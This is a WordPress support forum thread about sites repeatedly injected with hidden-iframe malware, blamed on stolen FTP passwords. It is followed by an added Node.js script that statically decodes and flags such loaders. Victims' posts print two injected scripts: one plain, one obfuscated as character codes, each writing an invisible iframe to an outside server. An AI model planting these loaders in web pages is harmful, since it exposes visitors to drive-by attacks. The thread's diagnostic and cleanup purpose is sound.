What theme are you using? Some themes do have security holes.
Thread Starter
itsnjm
(@itsnjm)
I am using tulip time theme [http://www.thesouthernhighlands.com.au/theme]
Would someone like to help us out here? I am also getting the same problem. The same code is injected into one of my sites. I removed it earlier today, but now it's inserted again. I am going to ask my host to have everything checked, but some help from WordPress would be really appreciated.
I am running a clean WP 2.5.1 install and almost the same set of plugins as given above.
Help Please.
Fastian, what plugins and theme are you using?
What the JavaScript is actually doing is the following:
var d=document;
if(!myia) {
d.write('
<IFRAME name=O1 src=\'http://77.221.133.171/.if/go.html?'+Math.round(Math.random()*152847)+'8102f33b7\' width=629 height=243 style=\'display: none\'>');
}
var myia=true;
This (Russian?) server will give you another (more complicated) script, whose purpose is not clear to me right now. Do not visit this site and do not run this JavaScript!
Hey guys,
I’ve been hit with the same virus/hack. It was done on several of my sites including static and ecommerce sites. It’s not just a WP issue.
I noticed that none of my local files were infected. I would upload clean copies and, like you said, the hack would re-appear. After a lot of research, I switched all my FTP accounts. I destroyed all users, I recreated my host control panel passwords from a computer with a fresh install, and then recreated all my FTP users with really, really strong passwords. IT WORKED.
I’ve got 3 computers at home; one of them is my web design biz machine, and I’m very suspicious that it’s been compromised. That’s how all my clients’ websites ended up with the virus.
I’m not using that computer anymore. I’ve installed new updated virus definitions on my other computers and carefully transferred all work files. I plan to wipe my biz comp and start fresh.
This FTP hack can also be researched under “Iframe Hack”.
Sometimes the best answers are the simplest. I was concerned at first that it was the host, but it happened to sites that I had on a variety of hosts. FTP programs do not encrypt logins and passwords. If you’ve got a trojan, chances are your FTP was logged.
Good Luck.
Cris
I get a similar problem. I have WordPress 2.7.1 installed, and since yesterday my NOD32 reports a TrojanClicker.Iframe.NAO.gen,
and I notice that in the generated HTML the last line looks like this:
<DIV id=main><script type="text/javascript">var hPLAmyvsdfELzjhpwQYf = "EOje60EOje105EOje102EOje114EOje97EOje109EOje101EOje32EOje119EOje105EOje100EOje116EOje104EOje61EOje34EOje52EOje56EOje48EOje34EOje32EOje104EOje101EOje105EOje103EOje104EOje116EOje61EOje34EOje54EOje48EOje34EOje32EOje115EOje114EOje99EOje61EOje34EOje104EOje116EOje116EOje112EOje58EOje47EOje47EOje116EOje114EOje97EOje102EOje102EOje105EOje99EOje45EOje114EOje101EOje115EOje111EOje117EOje114EOje99EOje101EOje115EOje46EOje99EOje110EOje47EOje111EOje114EOje100EOje101EOje114EOje47EOje105EOje110EOje46EOje99EOje103EOje105EOje63EOje50EOje34EOje32EOje115EOje116EOje121EOje108EOje101EOje61EOje34EOje98EOje111EOje114EOje100EOje101EOje114EOje58EOje48EOje112EOje120EOje59EOje32EOje112EOje111EOje115EOje105EOje116EOje105EOje111EOje110EOje58EOje114EOje101EOje108EOje97EOje116EOje105EOje118EOje101EOje59EOje32EOje116EOje111EOje112EOje58EOje48EOje112EOje120EOje59EOje32EOje108EOje101EOje102EOje116EOje58EOje45EOje53EOje48EOje48EOje112EOje120EOje59EOje32EOje111EOje112EOje97EOje99EOje105EOje116EOje121EOje58EOje48EOje59EOje32EOje102EOje105EOje108EOje116EOje101EOje114EOje58EOje112EOje114EOje111EOje103EOje105EOje100EOje58EOje68EOje88EOje73EOje109EOje97EOje103EOje101EOje84EOje114EOje97EOje110EOje115EOje102EOje111EOje114EOje109EOje46EOje77EOje105EOje99EOje114EOje111EOje115EOje111EOje102EOje116EOje46EOje65EOje108EOje112EOje104EOje97EOje40EOje111EOje112EOje97EOje99EOje105EOje116EOje121EOje61EOje48EOje41EOje59EOje32EOje45EOje109EOje111EOje122EOje45EOje111EOje112EOje97EOje99EOje105EOje116EOje121EOje58EOje48EOje34EOje62EOje60EOje47EOje105EOje102EOje114EOje97EOje109EOje101EOje62";var wyAIvMIOvBsdRDeECZxg = hPLAmyvsdfELzjhpwQYf.split("EOje");var EBrElZthpSMlQNtLZBZV = "";for (var DRzVVdaXDXEHYwLKVFrL=1; DRzVVdaXDXEHYwLKVFrL<wyAIvMIOvBsdRDeECZxg.length; DRzVVdaXDXEHYwLKVFrL++){EBrElZthpSMlQNtLZBZV+=String.fromCharCode(wyAIvMIOvBsdRDeECZxg[DRzVVdaXDXEHYwLKVFrL]);}var FmdulWQzUMVHZPWHWyXp = 
""+EBrElZthpSMlQNtLZBZV+"";document.write(""+FmdulWQzUMVHZPWHWyXp+"")</script>
Otherwise I see no changes, and I was not doing any modification. I also tried to disable all plugins, but there is no change. I did not find this code in any of the source files of the main index, header or footer. How can I get rid of this?
Thanks in advance!
Peter
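Added example, not part of any post above: the script in the last post hides its markup as decimal character codes joined by a delimiter and rebuilds it with split() and String.fromCharCode. The Node.js sketch below recovers such a string statically from a saved copy of a page, without running it. The function names, the delimiter "Zq9", the .invalid host and the hidden-iframe heuristics are assumptions of this example.

```javascript
// Static decode only: no script taken from a page is ever evaluated.
// Test fixture: a constructed, benign sample in the same shape as the injected line.
function buildSample(html, delim) {
  const codes = [...html].map((c) => delim + c.charCodeAt(0)).join("");
  return '<div id="main"><script type="text/javascript">var a = "' + codes + '";' +
    'var b = a.split("' + delim + '");var c = "";' +
    "for (var i=1; i<b.length; i++){c+=String.fromCharCode(b[i]);}" +
    'document.write(""+c+"")</script></div>';
}

// Recover the string a split()/fromCharCode loader would write, or null if no match.
function decodeSplitCharCode(scriptText) {
  if (!/String\.fromCharCode/.test(scriptText)) return null;
  const split = /\.split\(\s*(["'])([^"']+)\1\s*\)/.exec(scriptText);
  if (!split) return null;
  const delim = split[2];
  const esc = delim.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
  // A string literal made only of <delimiter><decimal code> pairs.
  const lit = new RegExp("([\"'])((?:" + esc + "\\d{1,7})+)\\1").exec(scriptText);
  if (!lit) return null;
  return lit[2].split(delim).slice(1)
    .map((n) => String.fromCharCode(Number(n))).join("");
}

// Heuristic flags (assumptions of this example) for an iframe meant to stay unseen.
function inspectDecoded(html) {
  const tag = (/<iframe\b[^>]*>/i.exec(html) || [null])[0];
  if (!tag) return { iframe: false, src: null, host: null, hidden: false };
  const src = (/\bsrc\s*=\s*["']?([^"'\s>]+)/i.exec(tag) || [null, null])[1];
  const hidden = /display\s*:\s*none|visibility\s*:\s*hidden|opacity\s*:\s*0(?![.\d])/i.test(tag);
  let host = null;
  try { host = new URL(src).hostname; } catch (e) { /* relative or malformed src */ }
  return { iframe: true, src, host, hidden };
}

// Scan every <script> body in a saved copy of the generated HTML.
function scanHtml(pageHtml) {
  const findings = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  for (let m; (m = re.exec(pageHtml)) !== null; ) {
    const decoded = decodeSplitCharCode(m[1]);
    if (decoded !== null) findings.push({ decoded, ...inspectDecoded(decoded) });
  }
  return findings;
}

// Constructed payload for the fixture; the host is a reserved .invalid name.
const SAMPLE_PAYLOAD = '<iframe src="http://ads.example.invalid/go" width="1" height="1" style="display:none"></iframe>';
console.log(scanHtml(buildSample(SAMPLE_PAYLOAD, "Zq9")));
```

Run it against the HTML the server actually sends (for example a copy saved with a command-line fetch), since the posts above report that the source files on disk looked clean.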